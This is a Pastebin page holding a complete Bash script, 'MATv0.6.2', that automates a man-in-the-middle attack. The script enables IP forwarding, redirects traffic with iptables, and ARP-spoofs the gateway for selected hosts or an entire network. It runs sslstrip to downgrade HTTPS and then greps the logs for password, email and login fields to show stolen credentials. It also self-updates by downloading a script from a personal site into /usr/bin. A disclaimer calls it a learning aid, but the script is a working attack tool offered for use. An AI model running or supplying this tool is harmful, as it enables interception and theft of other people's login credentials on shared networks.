Want more features on Pastebin? Sign Up, it's FREE!
Guest

MATv0.6.2

By: a guest on Feb 7th, 2011  |  syntax: Bash  |  size: 10.13 KB  |  views: 321  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
This paste has a previous version, view the difference. Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/bin/bash
  2. # Little bash script to launch man it the middle attack and sslstrip.
  3. # version 0.6 by comaX
  4. PROGNAME=$(basename $0)
  5. VERSION="0.6.2"
  6. #Let's define some arguments that can be passed to the script :
  7. args=
  8. while [ $# -ge 1 ] #check parameters
  9. do
  10.   case $1 in
  11.         -h | --help) #define help message
  12. clear
  13. echo -e "You are running $0, version $VERSION.
  14.  
  15. usage : $0 [-h | --help] | [-u | --upadte]
  16.         -h or --help : displays this help message, disclaimer and exit.
  17.         -u or --update updates and installs this script
  18.  
  19. \033[31m DISCLAIMER :\033[m
  20. This program is intended for learning purpose only. I do not condone hacking
  21. and wouldn't be held responsible for you actions. Only you would face legal
  22. consequences if you used this script for illegal activities.
  23.  
  24. \033[31m What I think should be learnt from this script :\033[m
  25. This script should teach you how easy it is to steal sensitive online
  26. credential and how to protect you from it, provided you understand
  27. what this program does. The best way to understand what it does is
  28. to look at its source. This will also teach you very basic shell script
  29. programming.
  30.  
  31. \033[31m Changelog :\033[m
  32. added in v0.6
  33. -Support for multiple targets
  34.  
  35. added in v0.5 :
  36. -Parameters for this great help message and update, more comments.
  37. -Minor improvments
  38.  
  39. added in v0.4 :
  40. -User friendly case insensitive answers (Y/y)
  41. -Option to map network, retrieving live hosts and their dns names
  42. -Minor improvments
  43.  
  44. \033[31m Credits :\033[m
  45. Credits goes to all people on backtrack forums for their help and support,
  46. and google for being my best friend with scripting.
  47.  
  48. Please criticize this program or submit ideas on the official thread at
  49. http://tiny.cc/mitmautomate or send me a mail at cyprien.bl@gmail.com"
  50. exit ;;
  51.         -u | --update) #update program
  52.                 echo "This will download the last version from official website, and then install it to /usr/bin/mitm. Program will then exit and reload new version. In next uses you will only have to issue 'mitm' from your console. Do you wish to proceed ? (Y/N)"
  53.                 read -e proceed
  54.                 if [[ $proceed = "y" || $proceed = "Y" ]] ; then
  55.                 wget http://comax.pagesperso-orange.fr/mitm.sh -O /tmp/mitm_update.sh #download most recent version to temp file
  56.                 cp /tmp/mitm_update.sh /usr/bin/mitm #copy it to /usr/bin
  57.                 rm /tmp/mitm_update.sh #delete temp file
  58.                 echo -e "\033[32m Script updated ! Restarting to updated version...\033[m"
  59.                 sleep 3
  60.                 chmod +x /usr/bin/mitm #make newly installed script executable
  61.                 /usr/bin/mitm #launch new script
  62.                 else echo -e "\033[31m Update aborted.\033[m Continuing with this version (you are using $0)." & sleep 2               
  63.                 fi ;;
  64.         *) echo "Invalid parameters, coninuing with script $0" & sleep 2 ;;
  65.   esac
  66.   shift
  67. done
  68.  
  69. clear
  70. echo -e "===========================================================================
  71. =\033[31m Welcome to MITM automation tool. Use this tool responsibly, and enjoy !\033[m =
  72. =   Feel free to contribute, and distribute this script as you please.    =
  73. =               Official thread : http://tiny.cc/mitmautomate             =
  74. =       Check out the help (-h) to see new features and informations      =
  75. =                   You are running version $VERSION.                     =
  76. ==========================================================================="
  77. echo
  78. echo
  79. # Starting fresh : reset ip forward and iptables
  80. echo -e "\033[31m [+] Cleaning iptables \033[m"
  81. echo "[-] Cleaned."
  82. echo "0" > /proc/sys/net/ipv4/ip_forward
  83. iptables --flush
  84. iptables --table nat --flush
  85. iptables --delete-chain
  86. iptables --table nat --delete-chain
  87.  
  88. # Defining exit function and other ending features
  89.  
  90. cleanup() {
  91. echo
  92. echo "[+] Killing processes and resetting iptable."
  93.  
  94. kill ${sslstripid}
  95. killall arpspoof
  96. echo "0" > /proc/sys/net/ipv4/ip_forward #stop ipforwarding
  97. iptables --flush                        # there are probably too many resets here,
  98. iptables --table nat --flush            # but at least we're sure everything's clean
  99. iptables --delete-chain
  100. iptables --table nat --delete-chain
  101.  
  102. echo "[+] Clean up successful..."
  103. echo -e "\033[31m [+] Let's have a look at sniffed passwords... \033[m" #Displaying results
  104. echo -e "\033[37m (Will be blank if no passwords were found) \033[m"
  105. egrep --color -i "&pwd=|&pass=|&passwd=|&password=|&textbox=|&email=|&user=|&login=" /tmp/$filename.txt #colorize all search terms when found
  106. echo
  107. echo "Do you want to keep log file for further use or shall we delete it ? (Y=keep)"
  108. echo "If you want to keep it, it will be stored in /root/$filename.txt"
  109. read -e keep
  110.         if [[ $keep = "Y" || $keep = "y" ]] ; then # double brackets because double condition. || signifies "or"
  111.         mv /tmp/$filename.txt /root/$filename.txt #moving file
  112.                 if [ -f "/root/$filename.txt" ]; then #check if it exists
  113.                 echo "Log file copied !" #it does
  114.                 else echo "Error while copying log file. Go check /tmp/ for $filename.txt" #it does not
  115.                 fi
  116.         else rm /tmp/$filename.txt #removing temp file
  117.         echo "All logs deleted"
  118. fi
  119. if [ -f "/usr/bin/mitm" ]; then #check if script is already installed
  120.         echo
  121.         echo
  122.         exit 1 #if yes, exit.
  123.         else
  124.         echo "This script is not installed yet. Do you wish to install it, so that you can reuse it later on by simply issuing 'mitm' in console ? (Y/N)" #if no, ask.
  125.         read -e install
  126.                 if [[ $install = "Y" || $install="y" ]] ; then
  127.                 cp ./mitm.sh /usr/bin/mitm #copy and rename script
  128.                 echo -e "\033[32m Script installed !\033[m"
  129.                 else echo "Script not installed."
  130.                 fi
  131.         fi
  132.  
  133. exit
  134. }
  135. ###############################End of functions#############################
  136. # IP forwarding
  137. echo
  138. echo -e "\033[31m [+] Activating ip forwarding... \033[m"
  139. echo "1" > /proc/sys/net/ipv4/ip_forward
  140. echo "[-] Activated."
  141.  
  142. #Iptables
  143. echo
  144. echo -e "\033[31m [+] Configuring iptables... \033[m"
  145. echo -en "\033[31m To \033[mwhat port should the traffic be redirected to ? (generally 10000)"
  146. echo
  147. read -e outport
  148. echo -en "\033[31m From \033[mwhat port should the traffic be redirected to ? (generally 80)"
  149. echo
  150. read -e inport
  151. echo -e "\033[33m Traffic from port $inport will be redirected to port $outport \033[m"
  152. iptables -t nat -A PREROUTING -p tcp --destination-port $inport -j REDIRECT --to-port $outport
  153. echo "[-] Traffic rerouted"
  154.  
  155. #Arpspoofing
  156. echo
  157. echo -e "\033[31m [+] Activating arpspoofing... \033[m"
  158. echo
  159. ip route show | grep ^default #ip route show, minimized to line begining with "default" : this is the one we need.
  160. echo
  161. echo "Enter gateway ip adress (as shown above) :"
  162. read -e gateway
  163. echo
  164. echo "What interface would you like to use ? (it should match gateway ip as shown above)"
  165. read -e iface
  166. echo
  167. echo "Would you like to target multiple (or single) targets or the whole network ? (Y=whole, N=single/multiple)"
  168. read -e choicearp
  169. echo
  170.  
  171. if [[ $choicearp = "N" || $choicearp = "n" ]] ; then
  172. echo
  173. echo -e "Do you want to map network to show live hosts ? (Y/N)  [This might take up to 30 secs, be patient]"
  174. read -e hosts
  175. echo -e "\033[31m "
  176.         if [[ $hosts = "Y" || $hosts = "y" ]] ; then
  177.         fping -anA -q -g $gateway/24 -r 0 &> /tmp/hosts.txt #search for live hosts, displaying ip and dns name and write to file to avoid 255 lines showing up
  178.         grep -v "ICMP" /tmp/hosts.txt # display all lines not containing "ICMP" (error lines, dead hosts)
  179.         rm /tmp/hosts.txt # remove temporary file
  180.         echo -e "\033[m " # switch color back to white
  181.         else echo -e "\033[m "
  182. fi
  183. echo -e "You can select up to 6 ip adresses. Just enter them one after another when prompted.\033[31m Beware ! This will spawn as many windows as input targets and might slow down performances. If that was the case, then use whole network tageting.\033[m "
  184. arpspoofi() {
  185. xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $1 $gateway 2>/dev/null & sleep 2
  186.        
  187. if [[ "$2" > "0" ]] ; then
  188.         xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $2 $gateway 2>/dev/null & sleep 2
  189.                 else echo
  190.         fi     
  191. if [[ "$3" > "0" ]] ; then
  192.         xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $3 $gateway 2>/dev/null & sleep 2
  193.                 else echo
  194.         fi
  195. if [[ "$4" > "0" ]] ; then
  196.         xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $4 $gateway 2>/dev/null & sleep 2
  197.         else echo
  198.         fi
  199. if [[ "$5" > "0" ]] ; then
  200.         xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $5 $gateway 2>/dev/null & sleep 2
  201.         else echo
  202.         fi
  203. if [[ "$6" > "0" ]] ; then
  204.         xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface -t $6 $gateway 2>/dev/null & sleep 2
  205. else echo
  206.         fi
  207. t1=$1
  208. t2=$2
  209. t3=$3
  210. t4=$4
  211. t5=$5
  212. t6=$6
  213.  
  214. }
  215. echo "Enter ip adresses"
  216. read -e parameters
  217. arpspoofi $parameters
  218. echo -e "\033[33m Targeting $t1 $t2 $t3 $t4 $t5 $t6 on $gateway on $iface\033[m"
  219. echo -e "[-] Arp spoofing is launched. \033[31m Keep new windows running. \033[m"
  220.  
  221. elif [[ $choicearp = "Y" || $choicearp = "y" ]] ; then
  222. xterm -geometry 10x10-1-1 -T arpspoof -e arpspoof -i $iface $gateway & arpspoofid=$!
  223. sleep 2
  224. echo -e "\033[33m Targeting the whole network on $gateway on $iface\033[m"
  225. echo -e "[-] Arp spoofing is launched. \033[31m Keep new window running. \033[m"
  226.  
  227. else echo "Your choice is invalid. Quitting."
  228. cleanup
  229. fi
  230.  
  231.  
  232. #Sslstrip
  233. echo
  234. echo -e "\033[31m [+] Activating sslstrip... \033[m"
  235. echo  "Choose filename to output :"
  236. read -e filename
  237. sslstrip -f -a -k -l $outport -w /tmp/$filename.txt & sslstripid=$! #output log to temp file
  238. sleep 2 #let time for sslstrip to launch. You may want to increase this time on slower machines
  239. echo
  240. echo -e "\033[33m Sslstrip will be listening on port $outport and outputing log in /tmp/$filename.txt\033[m"
  241. echo -e " [-] Sslstrip is running." # a bit redudant, but who cares ?
  242. echo
  243. echo -e "\033[37m Attack should be running smooth, enjoy.\033[m"
  244. echo
  245. echo -e "\033[33m To stop the attack, input 'quit' below :\033[m"
  246. echo
  247. read quitting
  248. if [ $quitting = "quit" ] ; then
  249.  
  250. cleanup
  251. else echo "Bad choice. Enter quit to stop attack"
  252. read -e quitting
  253. if [ $quitting = "quit" ] ; then
  254. cleanup
  255.  
  256. else echo "Bad choice. Enter quit to stop attack"
  257. read -e quitting
  258. if [ $quitting = "quit" ] ; then
  259. cleanup
  260.  
  261. else echo "Bad choice. Enter quit to stop attack"
  262. read -e quitting
  263. if [ $quitting = "quit" ] ; then
  264. cleanup
  265.  
  266. else echo "Bad choice. Enter quit to stop attack"
  267. echo
  268. echo -e "\033[31mNOW YOU'RE JUST BEING A FUCKING DOUCHE. QUITTING.\033[m" #I'm having fun here
  269. cleanup
  270. fi
  271. fi
  272. fi
  273. fi
clone this paste RAW Paste Data